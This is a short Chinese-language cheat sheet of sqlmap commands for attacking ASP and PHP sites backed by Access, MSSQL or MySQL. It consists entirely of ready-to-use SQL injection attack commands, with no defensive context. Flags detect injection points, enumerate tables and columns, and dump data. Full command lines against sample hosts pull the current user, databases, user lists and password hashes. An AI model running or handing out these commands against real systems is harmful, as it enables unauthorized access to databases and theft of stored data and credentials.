asp 大多用access MSSQL
Sqlmap -u "*" 检测是佛存在注入 返回数据库名
-T =tables 猜解所有表名
--colums 猜列名 -C “” 列名
--dump 下载数据
sqlmap.py -u http://www.evil0x.com/ test.php?p=2 -f -b –current-user –current-db –users –passwords –dbs -v 0
sqlmap -u “http://www.vuln.cn/post.php?id=1″ –dbms mysql –level 3